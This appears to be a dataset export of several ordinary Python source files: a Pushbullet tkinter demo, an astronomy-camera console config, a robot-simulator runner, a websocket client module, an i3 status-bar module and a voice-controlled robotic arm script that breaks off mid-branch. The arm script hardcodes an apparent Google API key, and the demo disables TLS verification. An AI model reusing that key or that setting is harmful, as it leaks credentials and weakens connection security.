source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
tk_upload_example.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Example tkinter app that uploads files and shows incoming pushes.
It is not necessary to connect to a listener and listen for pushes in order to upload,
but it makes the example more interesting.
"""
import asyncio
import logging
import os
import sys
import threading
import tkinter as tk
from functools import partial
from tkinter import filedialog
from tkinter_tools import BindableTextArea
sys.path.append("..") # Since examples are buried one level into source tree
from asyncpushbullet import AsyncPushbullet, LiveStreamListener, oauth2
__author__ = 'Robert Harder'
__email__ = "rob@iharder.net"
API_KEY = "" # YOUR API KEY
PROXY = os.environ.get("https_proxy") or os.environ.get("http_proxy")
# logging.basicConfig(level=logging.DEBUG)
class PushApp():
def __init__(self, root):
self.window = root
root.title("Async Pushbullet Upload Demo")
self.log = logging.getLogger(__name__)
# Data
self.ioloop = None # type: asyncio.AbstractEventLoop
self.pushbullet = None # type: AsyncPushbullet
self.pushbullet_listener = None # type: LiveStreamListener
self.key_var = tk.StringVar() # API key
self.pushes_var = tk.StringVar()
self.filename_var = tk.StringVar()
self.btn_upload = None # type: tk.Button
self.proxy_var = tk.StringVar()
# View / Control
self.create_widgets()
# Connections
self.create_io_loop()
self.key_var.set(API_KEY)
self.filename_var.set(__file__)
self.proxy_var.set(PROXY)
def create_widgets(self):
"""
API Key: [ ]
<Connect>
Filename: [ ]
<Browse> <Upload>
Pushes:
+----------------------------+
| |
+----------------------------+
"""
row = 0
# API Key
lbl_key = tk.Label(self.window, text="API Key:")
lbl_key.grid(row=row, column=0, sticky=tk.W)
txt_key = tk.Entry(self.window, textvariable=self.key_var)
txt_key.grid(row=row, column=1, sticky=tk.W + tk.E)
tk.Grid.grid_columnconfigure(self.window, 1, weight=1)
txt_key.bind('<Return>', lambda x: self.connect_button_clicked())
row += 1
btn_connect = tk.Button(self.window, text="Connect", command=self.connect_button_clicked)
btn_connect.grid(row=row, column=1, sticky=tk.W)
row += 1
# Proxy, if we want to show it
# lbl_proxy = tk.Label(self.window, text="Proxy")
# lbl_proxy.grid(row=row, column=0, sticky=tk.W)
# txt_proxy = tk.Entry(self.window, textvariable=self.proxy_var)
# txt_proxy.grid(row=row, column=1, sticky=tk.W + tk.E)
# row += 1
# File: [ ]
lbl_file = tk.Label(self.window, text="File:")
lbl_file.grid(row=row, column=0, sticky=tk.W)
txt_file = tk.Entry(self.window, textvariable=self.filename_var)
txt_file.grid(row=row, column=1, sticky=tk.W + tk.E)
row += 1
# <Browse> <Upload>
button_frame = tk.Frame(self.window)
button_frame.grid(row=row, column=0, columnspan=2, sticky=tk.W + tk.E)
row += 1
btn_browse = tk.Button(button_frame, text="Browse...", command=self.browse_button_clicked)
btn_browse.grid(row=0, column=0, sticky=tk.E)
self.btn_upload = tk.Button(button_frame, text="Upload and Push", command=self.upload_button_clicked,
state=tk.DISABLED)
self.btn_upload.grid(row=0, column=1, sticky=tk.W)
# Incoming pushes
# +------------+
# | |
# +------------+
lbl_data = tk.Label(self.window, text="Incoming Pushes...")
lbl_data.grid(row=row, column=0, sticky=tk.W)
row += 1
txt_data = BindableTextArea(self.window, textvariable=self.pushes_var, width=80, height=10)
txt_data.grid(row=row, column=0, columnspan=2)
def create_io_loop(self):
"""Creates a new thread to manage an asyncio event loop specifically for IO to/from Pushbullet."""
assert self.ioloop is None # This should only ever be run once
def _run(loop):
asyncio.set_event_loop(loop)
loop.run_forever()
self.ioloop = asyncio.new_event_loop()
self.ioloop.set_exception_handler(self._ioloop_exc_handler)
threading.Thread(target=partial(_run, self.ioloop), name="Thread-asyncio", daemon=True).start()
def _ioloop_exc_handler(self, loop: asyncio.BaseEventLoop, context: dict):
if "exception" in context:
self.status = context["exception"]
self.status = str(context)
# Handle this more robustly in real-world code
def connect_button_clicked(self):
self.pushes_var.set("Connecting...")
self.close()
async def _listen():
try:
self.pushbullet = AsyncPushbullet(self.key_var.get(),
verify_ssl=False,
proxy=self.proxy_var.get())
async with LiveStreamListener(self.pushbullet) as pl2:
self.pushbullet_listener = pl2
await self.connected(pl2)
async for push in pl2:
await self.push_received(push, pl2)
except Exception as ex:
print("Exception:", ex)
finally:
await self.disconnected(self.pushbullet_listener)
asyncio.run_coroutine_threadsafe(_listen(), self.ioloop)
def close(self):
if self.pushbullet is not None:
self.pushbullet.close_all_threadsafe()
self.pushbullet = None
if self.pushbullet_listener is not None:
assert self.ioloop is not None
pl = self.pushbullet_listener
asyncio.run_coroutine_threadsafe(pl.close(), self.ioloop)
self.pushbullet_listener = None
def browse_button_clicked(self):
print("browse_button_clicked")
resp = filedialog.askopenfilename(parent=self.window, title="Open a File to Push")
if resp != "":
self.filename_var.set(resp)
def upload_button_clicked(self):
self.pushes_var.set(self.pushes_var.get() + "Uploading...")
self.btn_upload["state"] = tk.DISABLED
filename = self.filename_var.get()
asyncio.run_coroutine_threadsafe(self.upload_file(filename), loop=self.ioloop)
async def upload_file(self, filename: str):
# This is the actual upload command
info = await self.pushbullet.async_upload_file(filename)
# Push a notification of the upload "as a file":
await self.pushbullet.async_push_file(info["file_name"], info["file_url"], info["file_type"],
title="File Arrived!", body="Please enjoy your file")
# Push a notification of the upload "as a link":
await self.pushbullet.async_push_link("Link to File Arrived!", info["file_url"], body="Please enjoy your file")
self.btn_upload["state"] = tk.NORMAL
self.pushes_var.set(self.pushes_var.get() + "Uploaded\n")
async def connected(self, listener: LiveStreamListener):
self.btn_upload["state"] = tk.NORMAL
self.pushes_var.set(self.pushes_var.get() + "Connected\n")
async def disconnected(self, listener: LiveStreamListener):
self.btn_upload["state"] = tk.DISABLED
self.pushes_var.set(self.pushes_var.get() + "Disconnected\n")
async def push_received(self, p: dict, listener: LiveStreamListener):
print("Push received:", p)
prev = self.pushes_var.get()
prev += "{}\n\n".format(p)
self.pushes_var.set(prev)
def main():
tk1 = tk.Tk()
program1 = PushApp(tk1)
tk1.mainloop()
if __name__ == '__main__':
API_KEY = oauth2.get_oauth2_key()
if not API_KEY:
with open("../api_key.txt") as f:
API_KEY = f.read().strip()
try:
main()
except KeyboardInterrupt:
print("Quitting")
pass
|
console_osu4k.py
|
# azcamconsole config file for OSU4k
import os
import threading
from azcam_ds9.ds9display import Ds9Display
import azcam
import azcam.shortcuts_console
# ****************************************************************
# files and folders
# ****************************************************************
azcam.db.systemname = "OSU4k"
azcam.db.systemfolder = f"{os.path.dirname(__file__)}"
azcam.utils.add_searchfolder(azcam.db.systemfolder, 0) # top level only
azcam.utils.add_searchfolder(os.path.join(azcam.db.systemfolder, "common"), 1)
azcam.db.datafolder = os.path.join("/data", azcam.db.systemname)
parfile = f"{azcam.db.datafolder}/parameters_console_{azcam.db.systemname}.ini"
# ****************************************************************
# add folders to search path
# ****************************************************************
azcam.utils.add_searchfolder(azcam.db.systemfolder, 0)
# ****************************************************************
# start logging
# ****************************************************************
logfile = os.path.join(azcam.db.datafolder, "logs", "console.log")
azcam.db.logger.start_logging(logfile=logfile)
azcam.log(f"Configuring console for {azcam.db.systemname}")
# ****************************************************************
# display
# ****************************************************************
display = Ds9Display()
dthread = threading.Thread(target=display.initialize, args=[])
dthread.start() # thread just for speed
# ****************************************************************
# console tools
# ****************************************************************
azcam.tools.create_console_tools()
# ****************************************************************
# try to connect to azcam
# ****************************************************************
server = azcam.db.server
connected = server.connect() # default host and port
if connected:
azcam.log("Connected to azcamserver")
else:
azcam.log("Not connected to azcamserver")
# ****************************************************************
# read par file
# ****************************************************************
pardict = azcam.db.params.read_parfile(parfile)
azcam.db.params.update_pars(0, "azcamconsole")
# ****************************************************************
# clean namespace
# # ****************************************************************
|
single_run.py
|
import argparse
import sys
from collections import deque
from queue import Queue
import time
from ev3sim.file_helper import find_abs
import yaml
from ev3sim.simulation.loader import runFromConfig
def single_run(preset_filename, robots, bind_addr):
preset_file = find_abs(preset_filename, allowed_areas=["local", "local/presets/", "package", "package/presets/"])
with open(preset_file, "r") as f:
config = yaml.safe_load(f)
config["robots"] = config.get("robots", []) + robots
shared_data = {
"tick": 0, # Current tick
"write_stack": deque(), # All write actions are processed through this
"data_queue": {}, # Simulation data for each bot
"active_count": {}, # Keeps track of which code connection each bot has.
"bot_locks": {}, # Threading Locks and Conditions for each bot to wait for connection actions
"bot_communications_data": {}, # Buffers and information for all bot communications
"tick_updates": {}, # Simply a dictionary where the simulation tick will push static data, so the other methods are aware of when the simulation has exited.
}
result_bucket = Queue(maxsize=1)
from threading import Thread
from ev3sim.simulation.communication import start_server_with_shared_data
def run(shared_data, result):
try:
runFromConfig(config, shared_data)
except Exception as e:
result.put(("Simulation", e))
return
result.put(True)
comm_thread = Thread(
target=start_server_with_shared_data, args=(shared_data, result_bucket, bind_addr), daemon=True
)
sim_thread = Thread(target=run, args=(shared_data, result_bucket), daemon=True)
comm_thread.start()
sim_thread.start()
try:
with result_bucket.not_empty:
while not result_bucket._qsize():
result_bucket.not_empty.wait(0.1)
r = result_bucket.get()
# Chuck it back on the queue so that other threads know we are quitting.
result_bucket.put(r)
if r is not True:
print(f"An error occurred in the {r[0]} thread. Raising an error now...")
time.sleep(1)
raise r[1]
except KeyboardInterrupt:
pass
|
multiprocessor_example.py
|
import time
import multiprocessing
import random
def job(job_id):
print('Starting job: {}'.format(job_id))
# do job here
sleep_time = random.uniform(5, 25)
print('Sleeping job: {}, for {}'.format(job_id, sleep_time))
time.sleep(sleep_time)
print('Ending job: {}'.format(job_id))
if __name__ == '__main__':
for i in range(10):
p = multiprocessing.Process(target=job, args=(i, ))
p.start()
|
_app.py
|
"""
websocket - WebSocket client library for Python
Copyright (C) 2010 Hiroki Ohtani(liris)
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor,
Boston, MA 02110-1335 USA
"""
"""
WebSocketApp provides higher level APIs.
"""
import threading
import time
import traceback
import sys
import select
import six
from ._core import WebSocket, getdefaulttimeout
from ._exceptions import *
from ._logging import *
from ._abnf import ABNF
__all__ = ["WebSocketApp"]
class WebSocketApp(object):
"""
Higher level of APIs are provided.
The interface is like JavaScript WebSocket object.
"""
def __init__(self, url, header=[],
on_open=None, on_message=None, on_error=None,
on_close=None, on_ping=None, on_pong=None,
on_cont_message=None,
keep_running=True, get_mask_key=None, cookie=None,
subprotocols=None,
on_data=None):
"""
url: websocket url.
header: custom header for websocket handshake.
on_open: callable object which is called at opening websocket.
this function has one argument. The argument is this class object.
on_message: callable object which is called when received data.
on_message has 2 arguments.
The 1st argument is this class object.
The 2nd argument is utf-8 string which we get from the server.
on_error: callable object which is called when we get error.
on_error has 2 arguments.
The 1st argument is this class object.
The 2nd argument is exception object.
on_close: callable object which is called when closed the connection.
this function has one argument. The argument is this class object.
on_cont_message: callback object which is called when receive continued
frame data.
on_message has 3 arguments.
The 1st argument is this class object.
The 2nd argument is utf-8 string which we get from the server.
The 3rd argument is continue flag. if 0, the data continue
to next frame data
on_data: callback object which is called when a message received.
This is called before on_message or on_cont_message,
and then on_message or on_cont_message is called.
on_data has 4 argument.
The 1st argument is this class object.
The 2nd argument is utf-8 string which we get from the server.
The 3rd argument is data type. ABNF.OPCODE_TEXT or ABNF.OPCODE_BINARY will be came.
The 4rd argument is continue flag. if 0, the data continue
keep_running: a boolean flag indicating whether the app's main loop
should keep running, defaults to True
get_mask_key: a callable to produce new mask keys,
see the WebSocket.set_mask_key's docstring for more information
subprotocols: array of available sub protocols. default is None.
"""
self.url = url
self.header = header
self.cookie = cookie
self.on_open = on_open
self.on_message = on_message
self.on_data = on_data
self.on_error = on_error
self.on_close = on_close
self.on_ping = on_ping
self.on_pong = on_pong
self.on_cont_message = on_cont_message
self.keep_running = keep_running
self.get_mask_key = get_mask_key
self.sock = None
self.last_ping_tm = 0
self.subprotocols = subprotocols
def send(self, data, opcode=ABNF.OPCODE_TEXT):
"""
send message.
data: message to send. If you set opcode to OPCODE_TEXT,
data must be utf-8 string or unicode.
opcode: operation code of data. default is OPCODE_TEXT.
"""
if not self.sock or self.sock.send(data, opcode) == 0:
raise WebSocketConnectionClosedException("Connection is already closed.")
def close(self):
"""
close websocket connection.
"""
self.keep_running = False
if self.sock:
self.sock.close()
def _send_ping(self, interval, event):
while not event.wait(interval):
self.last_ping_tm = time.time()
if self.sock:
self.sock.ping()
def run_forever(self, sockopt=None, sslopt=None,
ping_interval=0, ping_timeout=None,
http_proxy_host=None, http_proxy_port=None,
http_no_proxy=None, http_proxy_auth=None,
skip_utf8_validation=False,
host=None, origin=None):
"""
run event loop for WebSocket framework.
This loop is infinite loop and is alive during websocket is available.
sockopt: values for socket.setsockopt.
sockopt must be tuple
and each element is argument of sock.setsockopt.
sslopt: ssl socket optional dict.
ping_interval: automatically send "ping" command
every specified period(second)
if set to 0, not send automatically.
ping_timeout: timeout(second) if the pong message is not received.
http_proxy_host: http proxy host name.
http_proxy_port: http proxy port. If not set, set to 80.
http_no_proxy: host names, which doesn't use proxy.
skip_utf8_validation: skip utf8 validation.
host: update host header.
origin: update origin header.
"""
if not ping_timeout or ping_timeout <= 0:
ping_timeout = None
if sockopt is None:
sockopt = []
if sslopt is None:
sslopt = {}
if self.sock:
raise WebSocketException("socket is already opened")
thread = None
close_frame = None
try:
self.sock = WebSocket(self.get_mask_key,
sockopt=sockopt, sslopt=sslopt,
fire_cont_frame=self.on_cont_message and True or False,
skip_utf8_validation=skip_utf8_validation)
self.sock.settimeout(getdefaulttimeout())
self.sock.connect(self.url, header=self.header, cookie=self.cookie,
http_proxy_host=http_proxy_host,
http_proxy_port=http_proxy_port,
http_no_proxy=http_no_proxy, http_proxy_auth=http_proxy_auth,
subprotocols=self.subprotocols,
host=host, origin=origin)
self._callback(self.on_open)
if ping_interval:
event = threading.Event()
thread = threading.Thread(target=self._send_ping, args=(ping_interval, event))
thread.setDaemon(True)
thread.start()
while self.sock.connected:
r, w, e = select.select((self.sock.sock, ), (), (), ping_timeout)
if not self.keep_running:
break
if ping_timeout and self.last_ping_tm and time.time() - self.last_ping_tm > ping_timeout:
self.last_ping_tm = 0
raise WebSocketTimeoutException("ping timed out")
if r:
op_code, frame = self.sock.recv_data_frame(True)
if op_code == ABNF.OPCODE_CLOSE:
close_frame = frame
break
elif op_code == ABNF.OPCODE_PING:
self._callback(self.on_ping, frame.data)
elif op_code == ABNF.OPCODE_PONG:
self._callback(self.on_pong, frame.data)
elif op_code == ABNF.OPCODE_CONT and self.on_cont_message:
self._callback(self.on_data, data, frame.opcode, frame.fin)
self._callback(self.on_cont_message, frame.data, frame.fin)
else:
data = frame.data
if six.PY3 and frame.opcode == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
self._callback(self.on_data, data, frame.opcode, True)
self._callback(self.on_message, data)
except Exception as e:
self._callback(self.on_error, e)
finally:
if thread:
event.set()
thread.join()
self.keep_running = False
self.sock.close()
self._callback(self.on_close,
*self._get_close_args(close_frame.data if close_frame else None))
self.sock = None
def _get_close_args(self, data):
""" this functions extracts the code, reason from the close body
if they exists, and if the self.on_close except three arguments """
import inspect
# if the on_close callback is "old", just return empty list
if sys.version_info < (3, 0):
if not self.on_close or len(inspect.getargspec(self.on_close).args) != 3:
return []
else:
if not self.on_close or len(inspect.getfullargspec(self.on_close).args) != 3:
return []
if data and len(data) >= 2:
code = 256*six.byte2int(data[0:1]) + six.byte2int(data[1:2])
reason = data[2:].decode('utf-8')
return [code, reason]
return [None, None]
def _callback(self, callback, *args):
if callback:
try:
callback(self, *args)
except Exception as e:
error("error from callback {}: {}".format(callback, e))
if isEnabledForDebug():
_, _, tb = sys.exc_info()
traceback.print_tb(tb)
|
scratchpad.py
|
# -*- coding: utf-8 -*-
from threading import Thread
from i3pystatus import Module
import i3ipc
class Scratchpad(Module):
"""
Display the amount of windows and indicate urgency hints on scratchpad (async).
fork from scratchpad_async of py3status by cornerman
Requires the PyPI package `i3ipc`.
.. rubric:: Available formaters
* `{number}` — amount of windows on scratchpad
@author jok
@license BSD
"""
settings = (
("format", "format string."),
("always_show", "whether the indicator should be shown if there are"
" no scratchpad windows"),
("color_urgent", "color of urgent"),
("color", "text color"),
)
format = u"{number} ⌫"
always_show = True
color_urgent = "#900000"
color = "#FFFFFF"
def init(self):
self.count = 0
self.urgent = False
t = Thread(target=self._listen)
t.daemon = True
t.start()
def update_scratchpad_counter(self, conn, *args):
cons = conn.get_tree().scratchpad().leaves()
self.urgent = any(con for con in cons if con.urgent)
self.count = len(cons)
# output
if self.urgent:
color = self.color_urgent
else:
color = self.color
if self.always_show or self.count > 0:
full_text = self.format.format(number=self.count)
else:
full_text = ''
self.output = {
"full_text": full_text,
"color": color,
}
def _listen(self):
conn = i3ipc.Connection()
self.update_scratchpad_counter(conn)
conn.on('window::move', self.update_scratchpad_counter)
conn.on('window::urgent', self.update_scratchpad_counter)
conn.on('window::new', self.update_scratchpad_counter)
conn.on('window::close', self.update_scratchpad_counter)
conn.main()
|
vcra.py
|
#Project: Voice Controlled Robotic Arm
#Name: Abhishek Barla
#ID: 900559822
#Class: ECE 4242 - Senior Design II
#Professor: Dr. Barry Grossman
#GSA: Julius Chatterjee
#Semester: Spring 2015
#School: Florida Institute of Technology, Melbourne, FL, USA
#importing speech recognition libraries
import io, os, subprocess, wave
import math, audioop, collections
import json
#importing USB Control libraries
import usb.core
import usb.util
import sys
import time
# locate the device device
dev = usb.core.find(idVendor=0x1267, idProduct=0x0000)
# assigns the device to the handle "dev"
# can check the device is visible to Linux with command line command lsusb
# which should report a device with the above vendor and id codes.
# was it found?
if dev is None:
#raise ValueError('Device not found') # if device not found report an error
print "Device not found"
sys.exit(1)
# set the active configuration
dev.set_configuration()
try: # try to use python2 module
from urllib2 import Request, urlopen, URLError
except ImportError: # otherwise, use python3 module
from urllib.request import Request, urlopen
from urllib.error import URLError
#wip: filter out clicks and other too short parts
class AudioSource(object):
def __init__(self):
raise NotImplementedError("this is an abstract class")
def __enter__(self):
raise NotImplementedError("this is an abstract class")
def __exit__(self, exc_type, exc_value, traceback):
raise NotImplementedError("this is an abstract class")
try:
import pyaudio
class Microphone(AudioSource):
"""
This is available if PyAudio is available, and is undefined otherwise.
Creates a new ``Microphone`` instance, which represents a physical microphone on the computer. Subclass of ``AudioSource``.
If ``device_index`` is unspecified or ``None``, the default microphone is used as the audio source. Otherwise, ``device_index`` should be the index of the device to use for audio input.
"""
def __init__(self, device_index = None):
assert device_index is None or isinstance(device_index, int), "Device index must be None or an integer"
self.device_index = device_index
self.format = pyaudio.paInt16 # 16-bit int sampling
self.SAMPLE_WIDTH = pyaudio.get_sample_size(self.format)
self.RATE = 16000 # sampling rate in Hertz
self.CHANNELS = 1 # mono audio
self.CHUNK = 1024 # number of frames stored in each buffer
self.audio = None
self.stream = None
def __enter__(self):
self.audio = pyaudio.PyAudio()
self.stream = self.audio.open(
input_device_index = self.device_index,
format = self.format, rate = self.RATE, channels = self.CHANNELS, frames_per_buffer = self.CHUNK,
input = True, # stream is an input stream
)
return self
def __exit__(self, exc_type, exc_value, traceback):
self.stream.stop_stream()
self.stream.close()
self.stream = None
self.audio.terminate()
except ImportError:
pass
class WavFile(AudioSource):
"""
Creates a new ``WavFile`` instance, which represents a WAV audio file. Subclass of ``AudioSource``.
If ``filename_or_fileobject`` is a string, then it is interpreted as a path to a WAV audio file on the filesystem. Otherwise, ``filename_or_fileobject`` should be a file-like object such as ``io.BytesIO`` or similar. In either case, the specified file is used as the audio source.
"""
def __init__(self, filename_or_fileobject):
if isinstance(filename_or_fileobject, str):
self.filename = filename_or_fileobject
else:
assert filename_or_fileobject.read, "Given WAV file must be a filename string or a file object"
self.filename = None
self.wav_file = filename_or_fileobject
self.stream = None
def __enter__(self):
if self.filename: self.wav_file = open(self.filename, "rb")
self.wav_reader = wave.open(self.wav_file, "rb")
self.SAMPLE_WIDTH = self.wav_reader.getsampwidth()
self.RATE = self.wav_reader.getframerate()
self.CHANNELS = self.wav_reader.getnchannels()
assert self.CHANNELS == 1 # audio must be mono
self.CHUNK = 4096
self.stream = WavFile.WavStream(self.wav_reader)
return self
def __exit__(self, exc_type, exc_value, traceback):
if self.filename: self.wav_file.close()
self.stream = None
class WavStream(object):
def __init__(self, wav_reader):
self.wav_reader = wav_reader
def read(self, size = -1):
if size == -1:
return self.wav_reader.readframes(self.wav_reader.getnframes())
return self.wav_reader.readframes(size)
class AudioData(object):
def __init__(self, rate, data):
self.rate = rate
self.data = data
class Recognizer(AudioSource):
def __init__(self, language = "en-US", key = "AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw"):
"""
Creates a new ``Recognizer`` instance, which represents a collection of speech recognition functionality.
The language is determined by ``language``, a standard language code like `"en-US"` or `"en-GB"`, and defaults to US English. A list of supported language codes can be found `here <http://stackoverflow.com/questions/14257598/>`__. Basically, language codes can be just the language (``en``), or a language with a dialect (``en-US``).
The Google Speech Recognition API key is specified by ``key``. If not specified, it uses a generic key that works out of the box.
"""
assert isinstance(language, str), "Language code must be a string"
assert isinstance(key, str), "Key must be a string"
self.key = key
self.language = language
self.energy_threshold = 100 # minimum audio energy to consider for recording
self.pause_threshold = 0.8 # seconds of quiet time before a phrase is considered complete
self.quiet_duration = 0.5 # amount of quiet time to keep on both sides of the recording
def samples_to_flac(self, source, frame_data):
assert isinstance(source, AudioSource), "Source must be an audio source"
import platform, os, stat
with io.BytesIO() as wav_file:
wav_writer = wave.open(wav_file, "wb")
wav_writer.setsampwidth(source.SAMPLE_WIDTH)
wav_writer.setnchannels(source.CHANNELS)
wav_writer.setframerate(source.RATE)
wav_writer.writeframes(frame_data)
wav_writer.close()
wav_data = wav_file.getvalue()
# determine which converter executable to use
system = platform.system()
path = os.path.dirname(os.path.abspath(__file__)) # directory of the current module file, where all the FLAC bundled binaries are stored
flac_converter = shutil_which("flac") # check for installed version first
if flac_converter is None: # flac utility is not installed
if system == "Windows" and platform.machine() in ["i386", "x86", "x86_64", "AMD64"]: # Windows NT, use the bundled FLAC conversion utility
flac_converter = os.path.join(path, "flac-win32.exe")
elif system == "Linux" and platform.machine() in ["i386", "x86", "x86_64", "AMD64"]:
flac_converter = os .path.join(path, "flac-linux-i386")
else:
raise ChildProcessError("FLAC conversion utility not available - consider installing the FLAC command line application using brew install flac")
# mark covnerter as executable
try:
stat_info = os.stat(flac_converter)
os.chmod(flac_converter, stat_info.st_mode | stat.S_IEXEC)
except OSError: pass
process = subprocess.Popen("\"%s\" --stdout --totally-silent --best -" % flac_converter, stdin=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
flac_data, stderr = process.communicate(wav_data)
return flac_data
def record(self, source, duration = None):
"""
Records up to ``duration`` seconds of audio from ``source`` (an ``AudioSource`` instance) into an ``AudioData`` instance, which it returns.
If ``duration`` is not specified, then it will record until there is no more audio input.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
frames = io.BytesIO()
seconds_per_buffer = (source.CHUNK + 0.0) / source.RATE
elapsed_time = 0
while True: # loop for the total number of chunks needed
elapsed_time += seconds_per_buffer
if duration and elapsed_time > duration: break
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break
frames.write(buffer)
frame_data = frames.getvalue()
frames.close()
return AudioData(source.RATE, self.samples_to_flac(source, frame_data))
def listen(self, source, timeout = None):
"""
Records a single phrase from ``source`` (an ``AudioSource`` instance) into an ``AudioData`` instance, which it returns.
This is done by waiting until the audio has an energy above ``recognizer_instance.energy_threshold`` (the user has started speaking), and then recording until it encounters ``recognizer_instance.pause_threshold`` seconds of silence or there is no more audio input. The ending silence is not included.
The ``timeout`` parameter is the maximum number of seconds that it will wait for a phrase to start before giving up and throwing a ``TimeoutException`` exception. If ``None``, it will wait indefinitely.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
# record audio data as raw samples
frames = collections.deque()
assert self.pause_threshold >= self.quiet_duration >= 0
seconds_per_buffer = (source.CHUNK + 0.0) / source.RATE
pause_buffer_count = int(math.ceil(self.pause_threshold / seconds_per_buffer)) # number of buffers of quiet audio before the phrase is complete
quiet_buffer_count = int(math.ceil(self.quiet_duration / seconds_per_buffer)) # maximum number of buffers of quiet audio to retain before and after
elapsed_time = 0
# store audio input until the phrase starts
while True:
elapsed_time += seconds_per_buffer
if timeout and elapsed_time > timeout: # handle timeout if specified
raise TimeoutError("listening timed out")
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break # reached end of the stream
frames.append(buffer)
# check if the audio input has stopped being quiet
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # energy of the audio signal
if energy > self.energy_threshold:
break
if len(frames) > quiet_buffer_count: # ensure we only keep the needed amount of quiet buffers
frames.popleft()
# read audio input until the phrase ends
pause_count = 0
while True:
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break # reached end of the stream
frames.append(buffer)
# check if the audio input has gone quiet for longer than the pause threshold
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # energy of the audio signal
if energy > self.energy_threshold:
pause_count = 0
else:
pause_count += 1
if pause_count > pause_buffer_count: # end of the phrase
break
# obtain frame data
for i in range(quiet_buffer_count, pause_count): frames.pop() # remove extra quiet frames at the end
frame_data = b"".join(list(frames))
return AudioData(source.RATE, self.samples_to_flac(source, frame_data))
def recognize(self, audio_data, show_all = False):
"""
Performs speech recognition, using the Google Speech Recognition API, on ``audio_data`` (an ``AudioData`` instance).
Returns the most likely transcription if ``show_all`` is ``False``, otherwise it returns a ``dict`` of all possible transcriptions and their confidence levels.
Note: confidence is set to 0 if it isn't given by Google
Also raises a ``LookupError`` exception if the speech is unintelligible, a ``KeyError`` if the key isn't valid or the quota for the key has been maxed out, and ``IndexError`` if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
url = "http://www.google.com/speech-api/v2/recognize?client=chromium&lang=%s&key=%s" % (self.language, self.key)
self.request = Request(url, data = audio_data.data, headers = {"Content-Type": "audio/x-flac; rate=%s" % audio_data.rate})
# check for invalid key response from the server
try:
response = urlopen(self.request)
except URLError:
raise IndexError("No internet connection available to transfer audio data")
except:
raise KeyError("Server wouldn't respond (invalid key or quota has been maxed out)")
response_text = response.read().decode("utf-8")
# ignore any blank blocks
actual_result = []
for line in response_text.split("\n"):
if not line: continue
result = json.loads(line)["result"]
if len(result) != 0:
actual_result = result[0]
# make sure we have a list of transcriptions
if "alternative" not in actual_result:
raise LookupError("Speech is unintelligible")
# return the best guess unless told to do otherwise
if not show_all:
for prediction in actual_result["alternative"]:
if "confidence" in prediction:
return prediction["transcript"]
raise LookupError("Speech is unintelligible")
spoken_text = []
# check to see if Google thinks it's 100% correct
default_confidence = 0
if len(actual_result["alternative"])==1: default_confidence = 1
# return all the possibilities
for prediction in actual_result["alternative"]:
if "confidence" in prediction:
spoken_text.append({"text":prediction["transcript"],"confidence":prediction["confidence"]})
else:
spoken_text.append({"text":prediction["transcript"],"confidence":default_confidence})
return spoken_text
def listen_in_background(self, source, callback):
"""
Spawns a thread to repeatedly record phrases from ``source`` (an ``AudioSource`` instance) into an ``AudioData`` instance and call ``callback`` with that ``AudioData`` instance as soon as each phrase are detected.
Returns the thread (a ``threading.Thread`` instance) immediately, while the background thread continues to run in parallel.
Phrase recognition uses the exact same mechanism as ``recognizer_instance.listen(source)``.
The ``callback`` parameter is a function that should accept two parameters - the ``recognizer_instance``, and an ``AudioData`` instance representing the captured audio. Note that this function will be called from a non-main thread.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
import threading
def threaded_listen():
while True:
with source as s: audio = self.listen(s)
callback(self, audio)
listener_thread = threading.Thread(target=threaded_listen)
listener_thread.start()
return listener_thread
def shutil_which(pgm):
"""
python2 backport of python3's shutil.which()
"""
path = os.getenv('PATH')
for p in path.split(os.path.pathsep):
p = os.path.join(p, pgm)
if os.path.exists(p) and os.access(p, os.X_OK):
return p
#The Main Function contains all the Speech functions and the USB Controls
# r.listen and r.recognize are the Speech functions
# Microphone() enables us to take speech input from the default microphone. It is the audio source.
# datapack defines the command packet to send
# changes are made to this packet to make different moves.
# first byte defines most of the movements, second byte shoulder rotation, third byte light
# outputs the command to the USB device, using the ctrl_transfer method
# 0x40, 6, 0x100, 0 defines the details of the write - bRequestType, bRequest, wValue, wIndex
# datapack is our command (3 bytes)
# the final value is a timeout (in ms) which is optional
#Main Function
if __name__ == "__main__":
r = Recognizer()
m = Microphone()
should_restart = True
while should_restart:
should_restart = False
print("..............")
print("..............")
print("Say something!")
print("..............")
print("..............")
with m as source:
audio = r.listen(source)
print(".............................")
print(".............................")
print("Got it! Now recognizing it...")
print(".............................")
print(".............................")
try:
word = r.recognize(audio)
#If the Speech word is Elbow Up
if word == "elbow up":
print ("Elbow Up is working!")
datapack = 0x10,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
time.sleep(1) # waits for 1 second whilst motors move.
# now STOP the motors
datapack=0,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
should_restart = True
#If the Speech word is Elbow Down
if word == "elbow down":
print ("Elbow Down is working!")
datapack = 0x20,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
time.sleep(1) # waits for 1 second whilst motors move.
# now STOP the motors
datapack=0,0,0
bytesout=dev.ctrl_transfer(0x40, 6, 0x100, 0, datapack, 1000)
should_restart = True
#If the Speech word is Grip Close
if word == "shut":
print ("Grip Close is working!")
datapack = 0x01,0,0
